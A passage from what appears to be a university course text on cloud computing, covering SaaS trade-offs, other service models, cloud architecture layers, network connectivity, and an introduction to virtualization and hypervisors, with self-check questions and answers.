4. Ease of access: It is possible to access SaaS services from any device that has access to the Internet. The use
of SaaS services is not limited to a certain set of devices. It features are making it adaptable to all devices.

5. Dynamic scaling: On-premise software makes dynamic scalability harder since it requires extra hardware.
Because SaaS services make use of cloud elastic resources, they can manage any sudden spike in load without
disrupting the application's usual operation.

6. Disaster recovery: Every SaaS service is maintained with suitable backup and recovery techniques. A large
number of servers are used to store the replicas. The SaaS may be accessed from another server if the allocated
one fails. This solves the problem of single point of failure. It also ensures high availability of application.

7. Multi-tenancy: Multi-tenancy refers to sharing same application among multiple users improves resource
use for providers and decreases cost for users.

Data security is the biggest problem with SaaS services. Almost every organization is concerned about the
safety of the data stored on the provider's datacenter.
Some of the problems with SaaS services include the following:

1. Security: When transitioning to a SaaS application, security is a big issue. Data leakage is possible because the
SaaS application is shared by many end users. The data is kept in the datacenter of the service provider. We can't
trust our company's sensitive and secret data on third-party service provider. To avoid data loss, the end user must
be careful when choosing a SaaS provider.

2. Requirements for connectivity: In order to use SaaS applications, users must have internet connection. If the
user's internet connection is low in some cases then the user is unable to use the services. In SaaS applications, the
high-speed internet connection is the major problem.

3. Loss of control: The end user has no control over the data since it is kept in a third-party off-premise location.

Examples of SaaS

 Google GSuite (Apps)


 Dropbox, Salesforce
 Cisco WebEx and
 GoToMeeting

Figure 2.4.1 illustrates the three types of cloud computing services that are offered to clients. It's important
to note that cloud service delivery is made up of three distinct components: infrastructure, platform, and
software. The end user's responsibility in IaaS is development platform and the application that runs on top of
it are properly maintained. The underlying hardware must be maintained by the IaaS service providers. In
PaaS, end users are only responsible for developing and deploying the application and its data only. In SaaS,
user do not have any control over infrastructure management, development platform and end-user application,
all maintenance is handled by SaaS providers. The responsibility of the provider and user is indicated in Figure
2.4.2

Fig. 2.4.2 Service provider and User management responsibilities of SPI model
2.4.4 Other services
1. Network as a Service (NaaS): It allows end users to make use of virtual network services provided by the service
provider. It is a pay-per-use approach similar to other cloud service models, NaaS allows users to access virtual
network services through the Internet. In on-premise organizations, they have spent expenditure on network
equipment to run their own networks in their own datacenters. On the other hand, Naas are transformed into a utility
to make virtual organizations, virtual organization interface cards, virtual switches, virtual switches and other
systems administration components in the cloud environment. There are a number of popular services provided by
NaaS, including VPNs, bandwidth-on-demand, and virtualized mobile networks.

2. DEaaS (Desktop as a Service): It allows end customers to enjoy desktop virtualization service without having to
acquire and manage their own computing infrastructure. It is a pay-per-use model in which the provider handles data
storage, backup, security and updates on the back end. DEaaS services are easy to set up, secure, and provide a
better user experience across a wide range of devices.

3. STorage as a Service (STaaS): It provides end users with the opportunity to store data on the service provider's
storage services. Users may access their files from anywhere and at any time with STaaS. Virtual storage emulates
from physical storage is abstracted by the STaaS provider. STaaS is a utility-based cloud business model. Customers
may rent storage space from the STaaS provider and they can access from any location. STaaS provides disaster
recovery backup storage solution.

4. Database as a Service (DBaaS) : This service that allows end users to access databases without having to install
or manage them. Installing and maintaining databases is the responsibility of the service provider. End consumers
may utilize the services immediately and pay for them based on their use. Database administration is automated
using DBaaS. The database services may be accessed by end users using the service provider's APIs or web
interfaces. The database management procedure is made easier using DBaaS. DBaaS provides popular services such
as ScaleDB , SimpleDB, DynamicDB, MongoDB and GAE data store.

5. Data as a Service (DaaS): An on demand service provided by a cloud vendor to users to access the data over the
Internet. Data consists of text, photos, audio, and videos etc. all are part of the data. Other service models for
example SaaS and STaaS are closely related to DaaS. For offering a composite service, DaaS may simply include in
either SaaS or STaaS. Geographical data services and financial data services are two areas where DaaS is widely
employed. Agility, cost efficiency, and data quality are some of the benefits of DaaS.

6. SECurity as a Service (SECaaS): It is a pay-per-use security service that allows the user to access the cloud
provider's security service. The service provider combines its security services for the benefit of end customers in
SECaaS. It provides a wide range of security-related functions, including authentication, virus and malware /
spyware protection, intrusion detection, and security event management. Infrastructure and applications within a
company or organization are often protected by SECaaS service providers. SECaaS services are provided by Cisco,
McAfee or Panda etc.

7. Identity as a Service (IDaaS): It is possible to leverage a third-party service provider's authentication


infrastructure on behalf of end customers, which is called Identity as a Service (IDaaS). A company or business is
the most common end user of IDaaS. Any company may effortlessly maintain its workers' identities with IDaaS
services without incurring any extra costs. Services such as directory services and single sign-on are all included
within IDaaS in general, Integrated services, such as registration, authentication, risk and event monitoring,
identification and profile management.

 Check Your Progress 1

1.List out the names of popular cloud computing service providers


.……………………………………………………………………………
……………………………………………………………………………
…………………………………………………………………………..
2. Distinguish between public and private clouds.

……………………………………………………………………………
……………………………………………………………………………

2.5 CLOUD ARCHITECTURE

The cloud architecture is divided into four major levels based on their functionality. Below Fig. 2.5.1 is a
diagrammatic illustration of cloud computing architecture.

Fig. 2.5.1 Cloud Architecture

1. Client access Layer:


Client access layer is the top-most layer of cloud architecture. The clients of cloud are come into this layer. Clients
begin their journey toward cloud computing here. The client may use any device that supports basic web application
functionality, smart mobile or portable device such as thin or thick devices. Thick devices are general-purpose
computers or smart devices with sufficient computing power but on the other hand, a thin device has a very limited
processing capacity and depends on other systems. A cloud application is often accessible in the same manner as
that of web application but the characteristics of cloud application is different from web application. Thus, client
access layer is made up of different types of client smart devices.

2. Internet connectivity layer:


This internet network layer connects users to access the cloud. The entire structure of cloud is based on the internet
network connection through which clients access the services. In case of public cloud, it entirely relies on the
internet connection. The public cloud location is not known to the user but the public cloud may be accessed across
the world through the internet. The private cloud exists within organization premises; a local area network may
provide connection with in the organization. In both cases, the cloud is completely relies on the network connection
but users require minimal bandwidth while using the public or private cloud. Service-level agreements (SLAs)
doesn’t include the internet connection between the user and the cloud while considering QoS(Quality of Service),
so this layer will not be covered by the SLAs.

3. Cloud service management Layer


This layer is made up of technologies that are used to manage the cloud. Cloud management software that run on
this layer are responsible for managing the service providers resources such as scheduling, provisioning,
optimization (such as consolidating servers and storage workloads), and internal cloud governance. Activities in this
layer affect the SLAs agreed between clients and cloud vendor since this layer is dependent upon SLAs. SLA
violations occur when there is a lack of timely or consistent service. If a SLA is violated, the service provider is
required to pay a penalty. Both private and public cloud services are relies on these service level agreements. some
of the popular public cloud vendors are Microsoft Azure and AWS. Similarly some of the private cloud vendors are
Eucalyptus and Openstack are used to create and management of private clouds.

4. Layer of physical resources


The bottom layer is the actual hardware resources layer and it is the base or foundation layer of any cloud
architecture. The resources comprise compute, storage, database and network, which are the fundamental physical
computing resources that make up a cloud infrastructure. These physical resources are actually pooled from different
datacenters located at different locations to provide service to a large number of users. Service provider offers
compute systems as a service to host the applications of the user and also provides the software to manage the
application based on scalability of resources. Storage systems keep track of business information as well as data
created or processed by applications running on the computing systems.

Computing systems and storage systems are linked together through networks. A network, such as a local area
network (LAN) connects physical computing devices to one another, allowing applications running on the compute
systems to communicate with one another. A network connects compute and storage systems to access the data on
the storage systems. The cloud serves computing resources from several cloud datacenters, networks link the
scattered datacenters and allowing the datacenters to function as a single giant datacenter. Networks also link
various clouds to one another, allowing them to share cloud resources and services (as in the hybrid cloud model).

2.6 LAYERS AND ANATOMY OF THE CLOUD

The hierarchical structure of a cloud is called cloud anatomy. Cloud anatomy differs from architecture. It does not
include the communication channel on which it deliver the services, whereas architecture completely describes the
communication technology on which it operates. Cloud architecture is a hierarchical structure of technology on
which it defines and operates. Anatomy might therefore be considered as subset of cloud architecture. Figure 2.6.1
represents the cloud anatomy structure, which serves as the foundation for the cloud.
Fig.2.6.1 Layers of Cloud Anatomy

The cloud is made up of five main elements:

1. Application: Top most layer is the application layer. This layer may be used to execute any kind of software
application.

2. Platform: This layer exists below the application layer. It consists of executable platforms those are provided for
the execution developer applications.

3. Infrastructure: This layer lies below the platform layer. Infrastructure includes virtualized computational
resources are provided to the users to connect with other system components. It allows the users to manage both
applications and platforms. This allows the user to do computations based on their requirements.

4. Virtualization: It's a vital technology that allows cloud computing to function. It is the process of making
abstraction of actual physical hard ware resources are provided in virtual manner. It changes the way of providing
the same hardware resources are distributed to multiple tenants independently.

5. Physical hardware: The bottom most layer is the physical hardware layer. It consists of servers, network
components, databases and storage units.
2.7 NETWORK CONNECTIVITY IN CLOUD COMPUTING

The cloud resources include servers, storage, network bandwidth, and other computer equipment are distributed over
numerous locations and linked via networks. When an application is submitted for execution in the cloud, the
necessary and appropriate resources are used to run the application that connects these resources through the
internet. Network performance will be a major factor in the success of many cloud computing applications. Because
cloud computing offers a variety of deployment choices, a network connection viewpoint will be used to examine
cloud deployment models and their accessible components.

There following are the different types of network connectivity in cloud computing:

 Public Inter cloud Networking


Customers may be able to connect to public cloud over the internet, Some cloud providers can provide virtual
private networks (VPNs). Public cloud services bring up security issues, which are in turn connected to
performance. One possible strategy to provide security is to encourage connection through encrypted tunnels,
allowing data to be transferred across secure internet pipelines. This process will add the extra connectivity overhead
and employing it will almost probably increase latency and have an influence on performance.

If we want to minimize latency without sacrificing security, we must choose an appropriate routing strategy,
decreases communication latency by decreasing the number of transit hops in the path from cloud provider to
consumer, for instance. When a connection is made available via internet for peer to peer systems through a
federation of connected providers (also known as Internet service providers (ISPs).

 Private Inter Cloud Networking

In private cloud, the cloud and network connectivity is within organization premises. The connectivity with in
private cloud is provided through Internet VPN or VPN service. All services are accessed quickly through well-
established pre-cloud infrastructure. Moving to private clouds does not affect the ability to access application
performance

 Public Intra cloud Networking


Public intra cloud networking is the network connectivity included for public cloud model. The cloud resources that
are geographically distributed over datacenters and providing those resources to end users via the internet only. The
user cannot access public cloud intra networks since they are internal to the service provider. Quality of Service
(QoS) is primary factor considered for linked resources throughout the world. The majority of these performance
concerns and violations are addressed commercially in SLAs.

 Private Intra cloud Networking

Intra cloud networking is the most complex networking and connection challenge in cloud computing. The most
challenging aspect of private cloud is the private intra cloud networking. The applications running in this
environment are linked to intra cloud connection. Intra networking connects the provider datacenters owned by an
organization. Intra cloud networking will be used by all cloud computing systems to link users to the resource to
which their application has been assigned. Once the link is established to the resource, intra networking used to
serve the application to multiple users based on service oriented architecture (SOA). If the SOA concept is followed,
traffic may flow between application components and between the application and the user. The performance of
such connections will therefore have an influence on the overall performance of cloud computing.

Modern approaches should be used to assess cloud computing networks and connections, Globalization and
changing organization needs, particularly those related with expanded internet use, require more prominent
adaptability in the present corporate organization.
 Check Your Progress 2

1. How the cloud architecture differ from cloud anatomy?


……………………………………………………………………………
……………………………………………………………………………
…………………………………………………………………………..

2. Describe briefly about private cloud access networking?

.……………………………………………………………………………
……………………………………………………………………………
…………………………………………………………………………..

2.8 SUMMARY

We covered the three SPI cloud service types as well as the four cloud delivery models in this chapter. We also
looked at how much influence a consumer had over the various arrangements. After that, we looked at cloud
deployment and cloud service models from a variety of perspectives, leading to a discussion of how clouds arise and
how clouds are utilized. To begin, the deployment models are the foundation and must be understood before moving
on to other components of the cloud. The size, location, and complexity of these deployment models are all taken
into account.

In this chapter, we'll look at four different deployment models. Each deployment model is described, along with its
characteristics and applicability for various types of demands. Each deployment model is significant in its own right.
These deployment patterns are crucial, and they frequently have a significant influence on enterprises that rely on
the cloud. A wise deployment model decision always pays off in the long run, avoiding significant losses. As a
result, deployment models are given a lot of weight. Before diving into the complexities of cloud computing, it's
vital to understand a few key concepts, including one of the most significant: cloud architecture.

Before getting into the complexities of cloud computing, it's vital to understand a few key concepts, including one of
the most significant: cloud architecture. It has a basic structure with component dependencies indicated. Anatomy is
the same way as architecture; however it does not take into account any dependencies as architecture does. The
cloud network connection, which is at the heart of the cloud concept, is also critical. The network is the foundation
on which the cloud is built.

2.9 SOLUTIONS/ANSWERS

 Check Your Progress 1


1. List out the names of popular cloud computing service providers

 Microsoft Azure
 Rackspace Cloud
 Amazon Web Services (AWS)
 Alibaba Cloud
 IBM Cloud
 SAP
 Google Cloud
 VMWare
 Oracle
 Salesforce
2. Distinguish between public and private clouds.

Private Cloud
Public Cloud
It is managed by cloud service provider
It is managed by organization operational staff
On-demand scalability
Limited scalability
Multitenant architecture supports multiple users
Dedicated architecture supports users from single
from different organizations
organization
Services hosted on Shared servers
Services hosted on dedicated servers
Establishes connection to users through private
Establishes connection to users through internet
network within the organization

Cost of using public cloud is cost-effective than


Cost of using private cloud is costly compared to
private cloud
public cloud
Suited for less confidential information
Suited for secured confidential information

 Check Your Progress 2

1. How the cloud architecture differ from cloud anatomy?

Cloud anatomy describes the layers of cloud computing paradigm at service provider side. Cloud anatomy and cloud
architecture both are not same but anatomy is considered as part of cloud architecture. cloud architecture completely
specifies and explains the technology under which it operates but in anatomy does not include technology on which
it operates.

2. Describe briefly about private cloud access networking?

Virtual private network (VPN) establishes a secured private corporate network connection within private cloud to
access the services. The technology and methodologies are local to the organization network structure in the private
cloud. This cloud network might be an Internet-based VPN or a service supplied by the network operator.

2.10 FURTHER READINGS

1. Cloud Computing: Principles and Paradigms, Rajkumar Buyya, James Broberg and Andrzej M.
Goscinski, Wiley, 2011.
2. Mastering Cloud Computing, Rajkumar Buyya, Christian Vecchiola, and Thamarai Selvi, Tata McGraw
Hill, 2013.
3. Essentials of cloud Computing: K. Chandrasekhran, CRC press, 2014.
Unit 3: Resource Virtualization

Structure

3.1 Introduction
3.2 Objective
3.3 Virtualization and Underlying Abstraction
3.3.1 Virtualizing Physical Computing Resources
3.4 Advantages of Virtualization
3.5 Machine or Server Level Virtualization
3.6 Exploring Hypervisor or Virtual Machine Monitor
3.6.1 Hypervisor Based Virtualization Approaches
(Full Virtualization, Para Virtualization, Hardware-Assisted Virtualization)
3.7 Operating System-Level Virtualization
3.8 Network Level Virtualization
3.9 Storage Level Virtualization
3.10 Desktop Level Virtualization
3.11 XenServer Vs VMware

3.1 INTRODUCTION

Cloud Computing has gained immense popularity due to the availability of scalable Infrastructure
as a Services, Platform as a Service, and Software as a Services. This is a framework where
different kinds of services related to networks, computing resources, storage, development
platform, and application are provisioned through the internet. In this respect, the basic
information of cloud computing is already discussed in the previous unit. In this unit, we will
discuss the basics of virtualization, its advantages, and its underlying abstraction. It is to be noted
that virtualization is the fundamental technology that helps to create an abstraction layer that
hides the intricacy of the underlying hardware. The virtualization technique provides a secure and
isolated environment for any user application such that one running application does not affect
the execution of another application. Further, in this unit, we will learn about server-level
virtualization and explore different hypervisor-based virtualization approaches. We will also
discuss operating system-level virtualization, network virtualization, storage virtualization, and
desktop virtualization. Finally, a brief comparison will be done on hypervisors like XenServer
and VMware.

3.2 OBJECTIVE

After going through this unit you should be able to:


➔ describe virtualization and its advantage;
➔ understand the concept of machine or server-level virtualization;
➔ learn about the hypervisor-based virtualization approaches;
➔ understand the basics of the operating system, network, storage, and desktop
virtualization;
➔ compare among XenServer and VMware;

3.3 Virtualization and Underlying Abstraction


Virtualization is a key technology that creates an abstraction to hide the complexity of computing
infrastructure, storage, and networking. Though virtualization technology has been around for the
last 50 years, its popularity has increased with the advancement of cloud computing. In a cloud
environment virtualization allows maximum customization and control over hardware resources
and enables the utilization of hardware resources to their maximum capacity.

Virtualization allows the creation of an abstract layer over the available System hardware
elements like processor, storage, memory, and different customized computing environments.
The computing environment which is created is termed virtual as it simulates an environment
similar to a real computer with an operating system. The use of the virtual version of the
infrastructure is smooth as the user finds almost no difference in the experience when compared
to a real computing environment. One of the very good examples of virtualization is hardware
virtualization. In this kind of virtualization, customized virtual machines that work similarly to
the real computing systems are created. Software that runs on this virtual machine cannot directly
access the underlying hardware resources. For example, consider a computer system that runs
Linux operating system and simultaneously host a virtual machine that runs Windows operating
system. Here, the Windows operating system will only have access to hardware that is allocated
to virtual machines. Hardware virtualization plays an important role in provisioning the IaaS
service of cloud computing. Some of the other virtualization technologies for which virtual
environments are provided are networking, storage, and desktop. The overall environment of
virtualization may be divided into three layers: host layer, virtualization layer, and guest layer.
The host layer denotes a physical hardware device on which the guest is maintained.
Virtualization layer act as the middleware which creates a virtual environment similar to the real
computer environment to execute a guest virtual application. Here guests always communicate
through the virtualization layer and it may denote a virtual machine or any other virtual
application. A diagrammatic representation of the virtualization environment is shown in Figure
1.
Figure 1: Diagram showing the virtualization environment.

From the above discussion, it should be noted that in reality, the virtualization environment is a software
program, and hence virtualization technology has better control and flexibility over the underlying
environment. The capability of software to imitate a real computing environment has facilitated the
utilization of resources in an efficient way. In the last few years, virtualization technology has drastically
evolved and the current version of technology allows us to make use of the maximum benefit that
virtualization provides. In this respect some of the important characteristics of virtualization can be
discussed as follows:
➔ Advancement in Security: In reality, more than one guest virtual machine runs on a single host
machine, and on each virtual machine different virtual applications are executed. Further, it is
very important to run each virtual machine in isolation such that no two applications running on
different virtual machines interfere with each other. In this respect, virtual machine manager
(VMM) plays an important role by managing virtual machines efficiently and providing enough
security. The operations of the different virtual machines are observed by VMM and filtered
accordingly such that no unfavorable activity is permitted. Sometimes it becomes important to
hide some sensitive or important data of the host from other guest applications running on the
same system. This kind of functionality is automatically provided by the virtualization
environment.

Figure 2: Features provided by virtualization environment

➔ Managing of Execution: In addition to the features like security, sharing, aggregation, emulation,
and isolation are also considered to be important features of virtualization. The explanation of
these features are as follows:
◆ Sharing: Virtualization technology allows the execution of more than one guest virtual
machine over a single host physical machine. Here, the same hardware resources are
being shared by all the guest virtual machines. Here sharing of existing hardware
resources and using individual physical machines to their optimum capacity help to
minimize the requirement of a number of servers and the power consumption.

◆ Aggregation: Virtualization technology allows to combine, the resources of different


independent host machines and seems to guest as one virtual host. The cluster
management software is one of the very good examples of distributed computing. Cloud
computing environments also make use of these features.

◆ Emulation: Virtualization environment allows different guest applications to run on top


of the host physical machine. Here the underlying virtualized environment is a software
program and hence can be controlled more efficiently. Further, based on the requirement
of guest application or program the underlying environment can be adjusted or modified
for smooth execution.

◆ Isolation: Virtualization environment enables guest virtual machines to run in isolation


such that no virtual machine running on the same host physical machine interferes with
each other. The guest virtual application accesses the underlying resources through the
abstraction layer. The virtual machine manager monitors the operation of each guest
application and try to prevent vulnerable activity operation if any.

Virtualization technology is adopted by different areas of computing. Further, based on the requirements
and uses different virtualization techniques were developed and each technique has its own unique
characteristics. In this regard Figure 3. shows a detailed classification of virtualization techniques. We
will be discussing some of the techniques in detail in the later sections.
Figure 3: A classification of virtualization technique

Check your Progress 1


1) Explain the importance of virtualization in cloud computing?
………………………………………………………………………………………………
………………………………………………………………………………………………
………………………………………………………………………………………………

2) How security is achieved through virtualization?


………………………………………………………………………………………………
………………………………………………………………………………………………
………………………………………………………………………………………………
3) Emulation and isolation are important features of virtualization. Justify the statement.

………………………………………………………………………………………………………
…………
………………………………………………………………………………………………………
…………

………………………………………………………………………………………………………
…………

Figure 4: Diagram showing the traditional and virtual architecture

3.4 Advantages of Virtualization

As discussed earlier, virtualization creates an abstracted layer over the available hardware elements, such
as a processor, storage, and memory allowing them to disperse over several Virtual Computers, also
known as Virtual Machines (VMs). The importance of virtualization was realized when IT industries
were facing difficulty to overcome the problem of x86 servers which enable running of only a single
operating system and application. The virtualization technology paved the way for the existing IT
industry by maximizing the utilization of individual servers and enabling them to operate at their
maximum capacity. In this regard Figure 4. shows the difference in traditional and virtual architecture.
Further when we compare the older virtualization technique with the current version then we will notice
that the older virtualization technique used to support only a single CPU and it was slow. Further, the
current version of virtualization techniques has improved a lot and it was found that virtual machines may
execute server applications as well as bare metal computer systems.

In order to improve performance, and to maximize the availability and reliability of the service,
virtualization allows virtual machines to move from one host machine to another and this is called a
virtual machine migration. The migration of virtual machines is achievable as the underlying environment
is virtual. The virtual machine migration can be achieved offline or live. In case of offline migration the
guest virtual machine is temporarily stopped and after copying the image of the virtual machine’s
memory to the destination host machine virtual machine is restarted. Next in the case of live migration an
active virtual machine is moved from one host machine to another. It should also be noted that
virtualization technology prefers to migrate virtual machines from one host machine to another when
some kind of load balancing is required. The type of virtual machine is chosen based on the requirement,
that is if downtime is permissible then offline migration is preferred, or else live migration is preferred.
Virtualization allows for more efficient use of underlying resources, resulting in a higher return on a
company's hardware investment. Some other advantages of virtualization may also be highlighted and it
can be summarized as follows:

➔ Reducing Power Need: Virtualization helps to run more than one operating system and
application on a single physical system. This allows to reduce the requirement of more servers
and hence reducing the requirement of energy for running and cooling the physical machines.
➔ Lower Cost: Virtualization of hardware or software resources help to maximize the utilization of
individual resources without compromising with the performance. Thus the extra investment on
the servers is minimized by running more than one operating system and application on a single
server. In addition to this, the requirements for extra space are also reduced. In this way
virtualization technology is helping IT industries to achieve maximum benefit at a minimal cost.
➔ Better Availability: Virtualization technology allows to overcome the problem of sudden
downtime due to hardware fault or human-induced fault. That is virtualization provides a fault-
tolerant environment in which applications are run seamlessly. Virtualization allows better
control and flexibility over the underlying environment when compared to the standalone system.
Further, during the time of fault or system maintenance, virtualization technology may use live
migration techniques to migrate virtual machines from one server to another. Any application or
operating system crash results in downtime and lowers user productivity. As a result,
administrators can use virtualization to run many redundant virtual computers that can readily
handle this situation. However running numerous redundant Physical Servers, on the other hand,
will be costly.
➔ Resource Efficiency: We may run numerous applications on a single server with virtualization,
each with its own virtual machine, operating system, and without sacrificing the Quality of
Services like reliability and availability. In this way, virtualization allows efficient use of the
underlying physical hardware.
➔ Easier Management: In software-defined virtual machines, it is much easier to implement any
new rule or policy, making it much easier to create or alter policies. This may be possible as
virtualization technology provides better control over the virtual environment.
➔ Faster Provisioning: The process of setting up hardware for each application is time-consuming,
requires more space, and costs more money. Further provisioning a virtual machine (VM) is
faster, cheaper, and efficient and can be managed smoothly. Thus virtualization technology may
help to create the required configured virtual machines in minimum time and may also be able to
scale up or scale down the required demands in minimum time. Here it should be noted that the
problem of scalability may also be handled efficiently by virtualization techniques.
➔ Efficient resource management: As discussed earlier, virtualization provides better control and
flexibility when compared to traditional architecture. Virtualization allows IT administrators to
create and allocate the virtual machine faster and live- migrate the virtual machine from one
server to another when required to increase the availability and reliability of the services. In order
to manage the virtualized environment, there are a number of virtualization management tools
available and the selection of appropriate tools may help to manage the virtual resources
efficiently. This tool may help to seamlessly migrate the virtual machine from one system to
another with zero downtime. This may be required when any server needs maintenance or is not
performing well.
➔ Single point Administration: The virtualized environment can be managed and monitored
through single virtualization management tools. However, the selection of efficient tools that
provide all the virtualization services properly is important. The appropriate tool will help to
create and provision virtual machines efficiently, balance the workload, manage the security of
the individual virtual machines, monitor the performance of the infrastructure, and guarantee to
maximize the utilization of the resources. Here all the different services can be administered by a
single tool.
3.5 Machine or Server Level Virtualization
Server virtualization is a technique to divide a physical server into various small virtual servers
and each of these independent virtual servers runs its own operating system. These virtual servers
are also called virtual machines and the process of creation of such virtual machines is achieved
by hypervisors like Microsoft Hyper-V, Citrix XenServer, Oracle VM, Red Hat’s Kernel-based
Virtual Machine, VMware vSphere. Here it should be noted that each virtual machine runs in
isolation on the same host physical machine and are unaware of any other virtual machine
running on the same host physical machine. To achieve this kind of functionality and
transparency different kinds of virtualization techniques are used. Further, there are different
types of server-level virtualization and they are as follows:

★ Hypervisor
★ Para Virtualization
★ Full Virtualization
★ Hardware-Assisted Virtualization
★ Kernel level Virtualization
★ System-Level or Operating System Virtualization

There are numerous advantages associated with server virtualization. Some of them are as
follows:

➔ In the case of server virtualization, each virtual machine may be restarted independently
without affecting the execution of other virtual machines running on the same host
physical machine.
➔ Server virtualization can partition a single physical server into many small virtual servers
and allows to utilize the hardware of the existing physical servers efficiently. Therefore
this minimizes the requirement of the extra physical servers and the initial investment
cost.
➔ As each small virtual server executes in isolation, if any virtual machine faces any kind of
issues then it will not affect the execution of other virtual machines running on the same
host physical machine.
In addition to some of the advantages server virtualization also have some disadvantages and they
are as follows:

➔ In the case of a host physical machine, the server faces any problem and it goes offline
then all the guest virtual machines will also get affected and will go offline. This will
decrease the overall uptime of the services or applications running on an individual
virtual machine.
➔ Server virtualization allows the running of many numbers of virtual machines on the
same physical server, this may reduce the performance of the overall virtualized
environment.
➔ Generally, server virtualization environments are not easy to set up and manage.

3.6 Hypervisor
The hypervisor can be seen as an emulator or simply a software layer that can efficiently
coordinate and run independent virtual machines over single physical hardware such that
each virtual machine has physical access to the resources it needs. It also ensures that
virtual machines have their own address space and execution on one virtual machine does
not conflict with the other virtual machine running on the same host physical machine.

Prior to the notion of Hypervisor, most computers could only run one operating system at
most and this increased the reliability of the services and applications because the entire
system's hardware had to handle requests from a single operating system. However, the
demerit of this idea is that the system cannot utilize all of the computing capacity.
However, using a hypervisor minimizes the need for space, energy, and maintenance. The
hypervisor is also referred to as a virtual machine monitor and it helps to manage virtual
machines and their physical resource demands. It isolates virtual machines from one
another by logically provisioning and assigning computing power, memory, and storage.
Thus at any point of time if any virtual machine operation is vulnerable then it will not
affect the execution of another machine.

Figure 5: Type 1 Hypervisor

There are basically two types of hypervisor (i) Type 1 or bare metal and (ii) Type 2 or
Hosted. Hypervisors enable virtualization because they translate requests across virtual
and physical resources. Type 1 hypervisors may also be embedded into the firmware
around the same layer as the motherboard basics input/output system (BIOS). This helps
the host operating system to access and use the virtualization software.

➔ Type 1 hypervisor: This is also termed as “Bare metal” hypervisor. This type of
hypervisor runs directly on the underlying physical resources. For running this
kind of hypervisor operating system is not required and it itself acts as a host
operating system. These kinds of hypervisors are most commonly used in virtual
server scenarios (See Figure 5.).
Pros: These types of Hypervisor are highly effective as they can directly
communicate with physical hardware. It also raises the level of security, and
there was nothing in between them that could undermine security.

Cons: To administrate different VMs and manage the host hardware, a Type 1
hypervisor frequently requires a separate administration system.

Example:

Hyper-V hypervisor: Hyper-V is a Microsoft-designed hypervisor for


use on Windows systems. It is classified as a Type 1 hypervisor,
although it differs from other Type 1 hypervisors in that it does not
install on Windows and instead runs directly on the actual hardware as
the Host OS. As a result, it gains a performance edge.

Citrix XenServer: It is a commercial Type 1 Hypervisor that supports


Linux and Windows OS. It was developed by IBM and is generally
known as Citrix hypervisor. Xen supports virtualization technologies
such as Intel VT and AMD-V hardware-assisted environments. It also
supports paravirtualization, which alters the guest OS to work with the
hypervisor, improving performance.

ESXi hypervisor: VMware ESXi (Elastic Sky X Integrated) is a bare-


metal hypervisor mainly designed for server virtualization in the Data
Center. It can efficiently manage the group of Virtual machines.

VSphere hypervisor: Customers can download VMware ESXi for free


as part of the Free vSphere hypervisor, which also offers basic server
virtualization. Large businesses will purchase a more comprehensive
vSphere solution that includes a VMware's vCenter Server license. It is a
separate server used to manage the vSphere environment on physical
hosts.

➔ Type 2 hypervisor: This hypervisor is not compatible with the hardware it is


running on. It runs as a program on a computer's operating system. This type of
hypervisor takes the help of an operating system to deliver virtualization-based
services. Type 2 hypervisors are best suited for endpoint devices such as personal
computers that run an alternative operating system known as Guest OS. Type 2
hypervisors frequently provide a different toolkit that enhances the connection
between Guest and Host operating systems (See Figure 6.).

Pros: A type 2 hypervisor allows for rapid and easy access to a Guest OS while
the main operating system runs on the host physical machine. This kind of
facility immensely helps the end-user in their work. For example, a user can use
Cortana to access their favorite Linux-based tool (in Windows, only found a
speech dictation system ).

Cons: Type 2 hypervisors can cause performance overhead because they always
need a host operating system in between the guest Operating system and
underlying physical device. It also poses latency concerns and a potential security
risk if the Host OS is compromised.
Figure 6. Type 2 Hypervisor

Example:

VMware Workstation: It is the product of VMware focused on Linux and


Windows users, and its free Version (Player) allows it to run a single guest OS
while its paid version(Pro) allows users to run multiple operating systems on a
single personal computer.

Check your Progress 2

1) Explain live and offline virtual machine migration.

………………………………………………………………………………………………
………

………………………………………………………………………………………………
………

………………………………………………………………………………………………
………

2) Write three advantages and disadvantages of server virtualization.

………………………………………………………………………………………………
………

………………………………………………………………………………………………
………

………………………………………………………………………………………………
………
3) Compare between Type 1 hypervisor and Type 2 hypervisor.

………………………………………………………………………………………………
………

………………………………………………………………………………………………
………

………………………………………………………………………………………………
………

3.6.1 Full Virtualization:-

Full virtualization is a technique to run an application or operating system directly on a


VM without any alteration and it seems to the operating system that it is running on the
real physical hardware. In order to achieve this, the virtual machine manager provides an
environment that fully imitates the complete real hardware. In other words, full
virtualization is a strategy for creating a virtual machine environment that entirely
imitates the physical hardware. Every software can run on the underlying devices
executed in the Virtual machine. One of the important benefits with respect to full
virtualization is that it allows the execution of the unaltered guest operating systems in
isolation. These kinds of features provide extra security and enable the running of
different unmodified operating systems in the same environment. For example in the case
of operating design, newly developed code for experiments can run alongside previous
versions of operating systems in isolated virtual machines. The virtual machine manager
helps each virtual machine to obtain all of the existing services of the underlying physical
system. The virtual machine completely isolates the guest operating system from the
underlying hardware.

A binary translation and direct execution are used together to accomplish full
virtualization. The hardware CPU runs non-sensitive commands at normal speed for full
virtualization hypervisors. Operating system-related instructions are interpreted on the fly
for further use. As similar kinds of guest operating system instances can execute on
virtualized or real physical systems, the full virtualization technique delivers the most
required isolation and security solution for virtual instances running on the virtual
environment (see Figure 7).

Further, binary translation is a method of establishing full virtualization that does not
necessitate hardware virtualization. It entails looking for "unsafe" instructions in the
virtual guest's executable code, translating them into "safe" equivalents, and running the
translated code. If we talk with respect to VMware hypervisor, both direct execution and
binary translation techniques may be used to virtualize an operating system.
Figure 7: The figure depicts the full virtualization paradigm.

3.6.2 Paravirtualization:-

Paravirtualization is a virtualization approach for computing devices that enables virtual


machines (VMs) to get an interface comparable to the underlying or guest hardware. This
strategy seeks to increase the VM's performance (OS) by altering the guest operating
system. The guest OS is updated within paravirtualization. It recognizes that it is
executing in a virtualized environment on top of something like a hypervisor (the VM's
hardware) rather than on actual hardware.

Paravirtualization, which means "alongside virtualization," refers to communication


between the guest OS and the hypervisor to improve performance and efficiency. As
shown in Figure 8 paravirtualization entails replacing non-virtualizable instructions, with
hyper calls connecting directly, with the hypervisor's virtualization layer. Other essential
kernel tasks, including memory management, interrupt handling, and timekeeping, have
hyper-call interfaces provided by the hypervisor.

Full virtualization, in which the unmodified OS is unaware that it is virtualized and


sensitive OS calls are captured using binary translation, is not the same as
paravirtualization. Paravirtualization's value proposition is decreased virtualization
overhead. However, the performance advantage of paravirtualization over full
virtualization varies substantially depending on the workload. Paravirtualization's
compatibility and portability are limited because it cannot support unmodified operating
systems (e.g., Windows 2000/XP). Because it necessitates profound OS kernel
alterations, paravirtualization can cause substantial support and maintainability concerns
